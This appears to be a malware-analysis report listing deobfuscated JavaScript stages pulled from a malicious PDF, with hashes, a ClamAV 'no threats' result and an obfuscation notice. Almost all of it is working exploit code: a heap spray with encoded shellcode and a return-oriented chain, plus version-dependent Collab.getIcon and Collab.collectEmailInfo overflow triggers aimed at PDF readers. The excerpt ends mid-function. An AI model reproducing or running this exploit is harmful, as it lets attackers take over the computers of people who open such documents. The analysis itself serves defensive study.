function zzzzzzzz() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}
function zzzzzzzzzzzzzzzz()
{
blah = rep(128, unes("\x25\x754242\x25\x754242\x25\x754242\x25\x754242\x25\x754242")) +""+ sc
bbk = unes("\x25\x754242\x25\x754242");
wap = 20+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["l\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//ahplgha[
for (i=0;i<250;i++) mm[i] = bk + blah;
plin = rep(8000, unes("\x25\x75\x30a\x30a\x25\x75\x30a\x30a"));
if (app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 6.0)//gakghfvlgfal
{
Collab.collectEmailInfo({subj:0,msg:plin});
}
}
function exp() {
var jkdhg=app
if(app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 8.0)
{
zzzzzzzz();
}
else{
zzzzzzzzzzzzzzzz();
}
}
if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH
if(app.viewerVersion > 100)
{
for(i = 0; i<1000; i++)
LbWxSqgNmAwjUaoXaywhlH = LbWxSqgNmAwjUaoXaywhlH +0x120;
}
else
{ var LbWxSqgNmAwjUaoXaywhlH =unescape}
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH(strexchg("%u0C0C%u0C0CWRJJ4919WRJJ0700%u12bb%u0700WRJJ1022WRJJ0700%u0C0C%u0C0C%u0C0C%u0C0CWRJJ1599WRJJ0700WRJJ0124WRJJ0001WRJJ72f7WRJJ0700WRJJ0104WRJJ0001WRJJ15bbWRJJ0700WRJJ1000WRJJ0000WRJJ154dWRJJ0700WRJJ15bbWRJJ0700WRJJ0300WRJJ7ffeWRJJ7fb2WRJJ0700WRJJ15bbWRJJ0700WRJJ0011WRJJ0001WRJJa8acWRJJ0700WRJJ15bbWRJJ0700WRJJ0100WRJJ0001WRJJa8acWRJJ0700WRJJ72f7WRJJ0700WRJJ0011WRJJ0001WRJJ52e2WRJJ0700WRJJ5c54WRJJ0700WRJJffffWRJJffffWRJJ0100WRJJ0001WRJJ0000WRJJ0000WRJJ0104WRJJ0001WRJJ1000WRJJ0000WRJJ0040WRJJ0000WRJJd731WRJJ0700WRJJ15bbWRJJ0700WRJJ905aWRJJ9054WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJeb5aWRJJ5815WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJ1a8bWRJJ1889WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJc083WRJJ8304WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bbWRJJ0700WRJJ04c2WRJJfb81WRJJ154dWRJJ0700WRJJa722WRJJ0700WRJJ15bb%u0700%u0C0C%u0C0C%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ffWRJJ154dWRJJ0700WRJJd731WRJJ0700WRJJ112fWRJJ0700WRJJ3030WRJJ3030%u0C0c" +
"WRJJ14ebWRJJb258WRJJ8a98WRJJ3218WRJJ88daWRJJ4018WRJJ3881WRJJdadaWRJJdadaWRJJf175WRJJ05ebWRJJe7e8WRJJffffWRJJ64ffWRJJ17f0WRJJ806aWRJJf0f9WRJJ7e23WRJJa2b7WRJJc9f0WRJJ3ab7WRJJf099WRJJ7aa1WRJJ1be5WRJJc2f0WRJJbc4cWRJJf00cWRJJ0e2aWRJJc3cfWRJJ7bf0WRJJff0fWRJJf019WRJJfecfWRJJ6795WRJJ03f0WRJJ131fWRJJf07dWRJJae2aWRJJ8b97WRJJdbf0WRJJ3426WRJJf043WRJJ8b16WRJJ3492WRJJaaf0WRJJ09ecWRJJ1394WRJJ1b6cWRJJd874WRJJ6413WRJJ4aabWRJJ4aabWRJJ13fcWRJJa8c2WRJJd313WRJJ1394WRJJ84d1WRJJf113WRJJ1390WRJJb8d9WRJJ9113WRJJc8a0WRJJed80WRJJ356bWRJJ13f8WRJJa4ddWRJJd413WRJJe09dWRJJ559bWRJJc113WRJJ9bb8WRJJ1345WRJJ80e1WRJJ13d7WRJJ23acWRJJ6d9bWRJJ9701WRJJ9e26WRJJ5ca2WRJJ90ecWRJJ5259WRJJ9b9fWRJJde48WRJJ6973WRJJcca3WRJJ84bcWRJJ7cedWRJJc113WRJJ9bbcWRJJfe45WRJJa413WRJJ13e3WRJJ84c1WRJJ459bWRJJb49bWRJJ0d23WRJJ33c7WRJJf9cfWRJJ17a5WRJJ806aWRJJedf9WRJJ132cWRJJ1b74WRJJe074WRJJe511WRJJf264WRJJc69cWRJJceccWRJJcf67WRJJ1148WRJJ48ddWRJJ601bWRJJed67WRJJ1b9eWRJJ9c5eWRJJ73ceWRJJa574WRJJb898WRJJ9898WRJJ6beeWRJJ98f2WRJJ98f2WRJJf8f0WRJJ989bWRJJce98WRJJcf67WRJJ154cWRJJ7cddWRJJ98f2WRJJf2c8WRJJ158cWRJJ70ddWRJJcec8WRJJcf67WRJJ1d40WRJJec58WRJJ194aWRJJ70e5WRJJf7e8WRJJedf1WRJJ51edWRJJe519WRJJa574WRJJcff7WRJJed16WRJJ1158WRJJ70edWRJJdd13WRJJ9b60WRJJ6cddWRJJdd9bWRJJ1168WRJJ74ddWRJJf2c8WRJJ67d8WRJJ74cfWRJJdd11WRJJ1d7cWRJJ9758WRJJ961cWRJJ9899WRJJ1598WRJJ78ddWRJJ98f2WRJJ67c8WRJJ74edWRJJed67WRJJce7cWRJJcf67WRJJ1d40WRJJ9758WRJJ6e1cWRJJ9898WRJJce98WRJJcf67WRJJ1378WRJJ7cc5WRJJc59bWRJJ1168WRJJ78c5WRJJc59bWRJJ116cWRJJ44c5WRJJd513WRJJa860WRJJ93d4WRJJ7a67WRJJ1962WRJJ9c74WRJJ9899WRJJcc98WRJJ9cf0WRJJ9899WRJJ6798WRJJ68cfWRJJ581dWRJJ1c97WRJJ985bWRJJ9898WRJJfd11WRJJ9b40WRJJ135cWRJJ1360WRJJ7cedWRJJd513WRJJ6b68WRJJ133cWRJJ64e5WRJJ9af2WRJJed67WRJJ6740WRJJ70cfWRJJdd11WRJJ1b4cWRJJ6760WRJJ1c97WRJJ9805WRJJ9898WRJJed67WRJJ676cWRJJ78edWRJJ67c8WRJJ7ccfWRJJed67WRJJ674cWRJJ78cfWRJJed67WRJJ6740WRJJ54cfWRJJcf67WRJJd844WRJJ6013WRJJ511bWRJJ2867WRJJ6abaWRJJ6a36WRJJ1336WRJJ5f6cWRJJfb9eWRJJfcf5WRJJ5fb6WRJJ9cdeWRJJe0fdWRJJb8fdWRJJde5fWRJJb790WRJJb8fbWRJJ1bbaWRJJ945eWRJJ51abWRJJ9c12WRJJa497WRJJecbaWRJJ109eWRJJ969cWRJJ73d9" +
"WRJJ156bWRJJ9684WRJJ9b5eWRJJf298WRJJce98WRJJe513WRJJ6764WRJJ70cfWRJJ5ffeWRJJba9bWRJJ1198WRJJ70ddWRJJ601bWRJJec67WRJJ67acWRJJ48edWRJJd8f2WRJJcf67WRJJ1174WRJJ4cddWRJJ581dWRJJbdecWRJJ6013WRJJed13WRJJ1344WRJJ60d5WRJJ3c6bWRJJe513WRJJ6764WRJJ48edWRJJ67c8WRJJ70edWRJJcf67WRJJ677cWRJJ70edWRJJcf67WRJJf278WRJJ6798WRJJ40edWRJJcf67WRJJ676cWRJJ60cfWRJJ98f2WRJJ67c8WRJJ64cfWRJJdadaWRJJdada"));
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH(strexchg("WRJJ0c0CWRJJ0c0c"));
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<0x80;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp();
}
|
|||
generic_stage_recovery_001.js |
deobfuscated-js | generic stage recovery split-literal-normalize -> marker-WRJJ-to-%u from JavaScript object 27 at offset 0x5C5E6 | 8630 bytes |
SHA-256: 454307cdc37a22bb2ec5b03eb3798aab0155175c3c2bca448bbe2140ed8d2a8b |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
16 of 24 identifiers look randomly generated (e.g. 'KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoN') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
%u14eb%ub258%u8a98%u3218%u88da%u4018%u3881%udada%udada%uf175%u05eb%ue7e8%uffff%u64ff%u17f0%u806a%uf0f9%u7e23%ua2b7%uc9f0%u3ab7%uf099%u7aa1%u1be5%uc2f0%ubc4c%uf00c%u0e2a%uc3cf%u7bf0%uff0f%uf019%ufecf%u6795%u03f0%u131f%uf07d%uae2a%u8b97%udbf0%u3426%uf043%u8b16%u3492%uaaf0%u09ec%u1394%u1b6c%ud874%u6413%u4aab%u4aab%u13fc%ua8c2%ud313%u1394%u84d1%uf113%u1390%ub8d9%u9113%uc8a0%ued80%u356b")
)
;
sc2=unes(strexchg("%u13f8%ua4dd%ud413%ue09d%u559b%uc113%u9bb8%u1345%u80e1%u13d7%u23ac%u6d9b%u9701%u9e26%u5ca2%u90ec%u5259%u9b9f%ude48%u6973%ucca3%u84bc%u7ced%uc113%u9bbc%ufe45%ua413%u13e3%u84c1%u459b%ub49b%u0d23%u33c7%uf9cf%u17a5%u806a%uedf9%u132c%u1b74%ue074%ue511%uf264%uc69c%ucecc%ucf67%u1148%u48dd%u601b%ued67%u1b9e%u9c5e%u73ce%ua574%ub898%u9898%u6bee%u98f2%u98f2%uf8f0%u989b%uce98%ucf67%u154c%u7cdd%u98f2%uf2c8%u158c%u70dd%ucec8%ucf67%u1d40%uec58%u194a%u70e5%uf7e8%uedf1%u51ed%ue519%ua574%ucff7")
)
sc3=unes(strexchg("%ued16%u1158%u70ed%udd13%u9b60%u6cdd%udd9b%u1168%u74dd%uf2c8%u67d8%u74cf%udd11%u1d7c%u9758%u961c%u9899%u1598%u78dd%u98f2%u67c8%u74ed%ued67%uce7c%ucf67%u1d40%u9758%u6e1c%u9898%uce98%ucf67%u1378%u7cc5%uc59b%u1168%u78c5%uc59b%u116c%u44c5%ud513%ua860%u93d4%u7a67%u1962%u9c74%u9899%ucc98%u9cf0%u9899%u6798%u68cf%u581d%u1c97%u985b%u9898%ufd11%u9b40%u135c%u1360%u7ced%ud513%u6b68%u133c%u64e5%u9af2%ued67%u6740%u70cf%udd11%u1b4c%u6760%u1c97%u9805%u9898%ued67%u676c%u78ed%u67c8%u7ccf%ued67")
)
sc4=unes(strexchg("%u674c%u78cf%ued67%u6740%u54cf%ucf67%ud844%u6013%u511b%u2867%u6aba%u6a36%u1336%u5f6c%ufb9e%ufcf5%u5fb6%u9cde%ue0fd%ub8fd%ude5f%ub790%ub8fb%u1bba%u945e%u51ab%u9c12%ua497%uecba%u109e%u969c%u73d9%u156b%u9684%u9b5e%uf298%uce98%ue513%u6764%u70cf%u5ffe%uba9b%u1198%u70dd%u601b%uec67%u67ac%u48ed%ud8f2%ucf67%u1174%u4cdd%u581d%ubdec%u6013%ued13%u1344%u60d5%u3c6b%ue513%u6764%u48ed%u67c8%u70ed%ucf67%u677c%u70ed%ucf67%uf278%u6798%u40ed%ucf67%u676c%u60cf%u98f2%u67c8%u64cf%udada%udada"));
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function zzzzzzzz() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}
function zzzzzzzzzzzzzzzz()
{
blah = rep(128, unes("\x25\x754242\x25\x754242\x25\x754242\x25\x754242\x25\x754242")) +""+ sc
bbk = unes("\x25\x754242\x25\x754242");
wap = 20+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["l\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//ahplgha[
for (i=0;i<250;i++) mm[i] = bk + blah;
plin = rep(8000, unes("\x25\x75\x30a\x30a\x25\x75\x30a\x30a"));
if (app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 6.0)//gakghfvlgfal
{
Collab.collectEmailInfo({subj:0,msg:plin});
}
}
function exp() {
var jkdhg=app
if(app["\x76\x69\x65\x77\x65\x72\x56\x65\x72\x73\x69\x6F\x6E"] >= 8.0)
{
zzzzzzzz();
}
else{
zzzzzzzzzzzzzzzz();
}
}
if(app.viewerVersion>=9.00)
{
var LbWxSqgNmAwjUaoXaywhlH
if(app.viewerVersion > 100)
{
for(i = 0; i<1000; i++)
LbWxSqgNmAwjUaoXaywhlH = LbWxSqgNmAwjUaoXaywhlH +0x120;
}
else
{ var LbWxSqgNmAwjUaoXaywhlH =unescape}
var TCfIpiOxOYTTeNgDQsDQaDtVjQ;
for(i=0;i<18000;i++)
TCfIpiOxOYTTeNgDQsDQaDtVjQ = TCfIpiOxOYTTeNgDQsDQaDtVjQ+0x70;
var TCfIpiOxOYTTeNgDQsDQaDtVjQ = LbWxSqgNmAwjUaoXaywhlH(strexchg("%u0C0C%u0C0C%u4919%u0700%u12bb%u0700%u1022%u0700%u0C0C%u0C0C%u0C0C%u0C0C%u1599%u0700%u0124%u0001%u72f7%u0700%u0104%u0001%u15bb%u0700%u1000%u0000%u154d%u0700%u15bb%u0700%u0300%u7ffe%u7fb2%u0700%u15bb%u0700%u0011%u0001%ua8ac%u0700%u15bb%u0700%u0100%u0001%ua8ac%u0700%u72f7%u0700%u0011%u0001%u52e2%u0700%u5c54%u0700%uffff%uffff%u0100%u0001%u0000%u0000%u0104%u0001%u1000%u0000%u0040%u0000%ud731%u0700%u15bb%u0700%u905a%u9054%u154d%u0700%ua722%u0700%u15bb%u0700%ueb5a%u5815%u154d%u0700%ua722%u0700%u15bb%u0700%u1a8b%u1889%u154d%u0700%ua722%u0700%u15bb%u0700%uc083%u8304%u154d%u0700%ua722%u0700%u15bb%u0700%u04c2%ufb81%u154d%u0700%ua722%u0700%u15bb%u0700%u0C0C%u0C0C%u154d%u0700%ua722%u0700%u15bb%u0700%uee75%u05eb%u154d%u0700%ua722%u0700%u15bb%u0700%ue6e8%uffff%u154d%u0700%ua722%u0700%u15bb%u0700%u90ff%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%u9090%u9090%u154d%u0700%ua722%u0700%u15bb%u0700%uffff%u90ff%u154d%u0700%ud731%u0700%u112f%u0700%u3030%u3030%u0C0c" +
"%u14eb%ub258%u8a98%u3218%u88da%u4018%u3881%udada%udada%uf175%u05eb%ue7e8%uffff%u64ff%u17f0%u806a%uf0f9%u7e23%ua2b7%uc9f0%u3ab7%uf099%u7aa1%u1be5%uc2f0%ubc4c%uf00c%u0e2a%uc3cf%u7bf0%uff0f%uf019%ufecf%u6795%u03f0%u131f%uf07d%uae2a%u8b97%udbf0%u3426%uf043%u8b16%u3492%uaaf0%u09ec%u1394%u1b6c%ud874%u6413%u4aab%u4aab%u13fc%ua8c2%ud313%u1394%u84d1%uf113%u1390%ub8d9%u9113%uc8a0%ued80%u356b%u13f8%ua4dd%ud413%ue09d%u559b%uc113%u9bb8%u1345%u80e1%u13d7%u23ac%u6d9b%u9701%u9e26%u5ca2%u90ec%u5259%u9b9f%ude48%u6973%ucca3%u84bc%u7ced%uc113%u9bbc%ufe45%ua413%u13e3%u84c1%u459b%ub49b%u0d23%u33c7%uf9cf%u17a5%u806a%uedf9%u132c%u1b74%ue074%ue511%uf264%uc69c%ucecc%ucf67%u1148%u48dd%u601b%ued67%u1b9e%u9c5e%u73ce%ua574%ub898%u9898%u6bee%u98f2%u98f2%uf8f0%u989b%uce98%ucf67%u154c%u7cdd%u98f2%uf2c8%u158c%u70dd%ucec8%ucf67%u1d40%uec58%u194a%u70e5%uf7e8%uedf1%u51ed%ue519%ua574%ucff7%ued16%u1158%u70ed%udd13%u9b60%u6cdd%udd9b%u1168%u74dd%uf2c8%u67d8%u74cf%udd11%u1d7c%u9758%u961c%u9899%u1598%u78dd%u98f2%u67c8%u74ed%ued67%uce7c%ucf67%u1d40%u9758%u6e1c%u9898%uce98%ucf67%u1378%u7cc5%uc59b%u1168%u78c5%uc59b%u116c%u44c5%ud513%ua860%u93d4%u7a67%u1962%u9c74%u9899%ucc98%u9cf0%u9899%u6798%u68cf%u581d%u1c97%u985b%u9898%ufd11%u9b40%u135c%u1360%u7ced%ud513%u6b68%u133c%u64e5%u9af2%ued67%u6740%u70cf%udd11%u1b4c%u6760%u1c97%u9805%u9898%ued67%u676c%u78ed%u67c8%u7ccf%ued67%u674c%u78cf%ued67%u6740%u54cf%ucf67%ud844%u6013%u511b%u2867%u6aba%u6a36%u1336%u5f6c%ufb9e%ufcf5%u5fb6%u9cde%ue0fd%ub8fd%ude5f%ub790%ub8fb%u1bba%u945e%u51ab%u9c12%ua497%uecba%u109e%u969c%u73d9" +
"%u156b%u9684%u9b5e%uf298%uce98%ue513%u6764%u70cf%u5ffe%uba9b%u1198%u70dd%u601b%uec67%u67ac%u48ed%ud8f2%ucf67%u1174%u4cdd%u581d%ubdec%u6013%ued13%u1344%u60d5%u3c6b%ue513%u6764%u48ed%u67c8%u70ed%ucf67%u677c%u70ed%ucf67%uf278%u6798%u40ed%ucf67%u676c%u60cf%u98f2%u67c8%u64cf%udada%udada"));
var XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV = LbWxSqgNmAwjUaoXaywhlH(strexchg("%u0c0C%u0c0c"));
while (XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["l\x65\x6e\x67\x74\x68"] +28 < 65536)
XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV+=XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo = XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, (3084-36)/2);
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += TCfIpiOxOYTTeNgDQsDQaDtVjQ;
KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo += XKtjCxpAIbqdRwoMdiBCpVSjcTYFRzGELEihzuiDjaUHqPKUpjzVplIanruZkjmlHjJpV;
KoHQQkRIckZJKtdlKTGyUUS = KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoNohJhsqyPygdvFvAalRntpAyIGDrzYxVhTGNylo["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 65536/2);
while(KoHQQkRIckZJKtdlKTGyUUS["l\x65\x6e\x67\x74\x68"] < 524288) KoHQQkRIckZJKtdlKTGyUUS += KoHQQkRIckZJKtdlKTGyUUS;
bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz = KoHQQkRIckZJKtdlKTGyUUS["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, 524288-4120/2) //ashlfajl;afj
var JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY = new Array()//ip[wo][]
for(tYzswEF=0;tYzswEF<0x80;tYzswEF++) JkNUxvkKFXvIXewntXRjnLOytMONPyrcUEpPSGrzHuBijVDY[tYzswEF]=bdfzsvuobNyDZnrqvFjkFWMnGaDbvlYCKTfwjiCwLEXKoTngADhROnZManDz+"s";
//shklfh
//ahf;lajf;
}
else
{
exp();
}
|
|||
generic_stage_recovery_002.js |
deobfuscated-js | generic stage recovery split-literal-normalize -> marker-WRJJ-to-%u from JavaScript object 27 at offset 0x5C5E6 | 8215 bytes |
SHA-256: ee83449659f83831df5389a4ef732ec0bc9c9b5505d2bde1b63f7aaf486c28d3 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
16 of 24 identifiers look randomly generated (e.g. 'KamKpVdorBTYgaOYYulKQswCiJyjvhZksBoGyWoN') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
%u13f8%ua4dd%ud413%ue09d%u559b%uc113%u9bb8%u1345%u80e1%u13d7%u23ac%u6d9b%u9701%u9e26%u5ca2%u90ec%u5259%u9b9f%ude48%u6973%ucca3%u84bc%u7ced%uc113%u9bbc%ufe45%ua413%u13e3%u84c1%u459b%ub49b%u0d23%u33c7%uf9cf%u17a5%u806a%uedf9%u132c%u1b74%ue074%ue511%uf264%uc69c%ucecc%ucf67%u1148%u48dd%u601b%ued67%u1b9e%u9c5e%u73ce%ua574%ub898%u9898%u6bee%u98f2%u98f2%uf8f0%u989b%uce98%ucf67%u154c%u7cdd%u98f2%uf2c8%u158c%u70dd%ucec8%ucf67%u1d40%uec58%u194a%u70e5%uf7e8%uedf1%u51ed%ue519%ua574%ucff7")
)
sc3=unes(strexchg("%ued16%u1158%u70ed%udd13%u9b60%u6cdd%udd9b%u1168%u74dd%uf2c8%u67d8%u74cf%udd11%u1d7c%u9758%u961c%u9899%u1598%u78dd%u98f2%u67c8%u74ed%ued67%uce7c%ucf67%u1d40%u9758%u6e1c%u9898%uce98%ucf67%u1378%u7cc5%uc59b%u1168%u78c5%uc59b%u116c%u44c5%ud513%ua860%u93d4%u7a67%u1962%u9c74%u9899%ucc98%u9cf0%u9899%u6798%u68cf%u581d%u1c97%u985b%u9898%ufd11%u9b40%u135c%u1360%u7ced%ud513%u6b68%u133c%u64e5%u9af2%ued67%u6740%u70cf%udd11%u1b4c%u6760%u1c97%u9805%u9898%ued67%u676c%u78ed%u67c8%u7ccf%ued67")
)
sc4=unes(strexchg("%u674c%u78cf%ued67%u6740%u54cf%ucf67%ud844%u6013%u511b%u2867%u6aba%u6a36%u1336%u5f6c%ufb9e%ufcf5%u5fb6%u9cde%ue0fd%ub8fd%ude5f%ub790%ub8fb%u1bba%u945e%u51ab%u9c12%ua497%uecba%u109e%u969c%u73d9%u156b%u9684%u9b5e%uf298%uce98%ue513%u6764%u70cf%u5ffe%uba9b%u1198%u70dd%u601b%uec67%u67ac%u48ed%ud8f2%ucf67%u1174%u4cdd%u581d%ubdec%u6013%ued13%u1344%u60d5%u3c6b%ue513%u6764%u48ed%u67c8%u70ed%ucf67%u677c%u70ed%ucf67%uf278%u6798%u40ed%ucf67%u676c%u60cf%u98f2%u67c8%u64cf%udada%udada"));
////////////agjpg;./.gw]\qwgkq
sc=""+sc1+""+sc2+""+sc3+sc4;
function zzzzzzzz() {
blah = rep(128, unes("%u4242%u4242%u4242%u4242%u4242")) + sc;
bbk = unes("%u4242%u4242");
var h="g\x65t\x49\x63\x6f\x6e";
wap = 0x24+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
while(bk["\x6c\x65\x6e\x67\x74\x68"]+wap<262144) bk = bk+bk+fillbk;
mm = new Array()//jf;afkla'[
for (i=0;i<350;i++) mm[i] = bk + blah;
of = rep(4096, myunes("\x30a\x30a\x30a\x30a"));
var a=["\x5f\x4e\x2e\x62\x75\x6e\x64\x6c\x65"];//next time
var b=5;//shlshgl
Collab[h](of+a[b-b])//ajf[pa';[
}
function zzzzzzzzzzzzzzzz()
{
blah = rep(128, unes("\x25\x754242\x25\x754242\x25\x754242\x25\x754242\x25\x754242")) +""+ sc
bbk = unes("\x25\x754242\x25\x754242");
wap = 20+blah["l\x65\x6e\x67\x74\x68"]
while (bbk["l\x65\x6e\x67\x74\x68"]<wap) bbk+=bbk;
fillbk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, wap);
bk = bbk["\x73\x75\x62\x73\x74\x72\x69\x6e\x67"](0, bbk["l\x65\x6e\x67\x74\x68"]-wap);
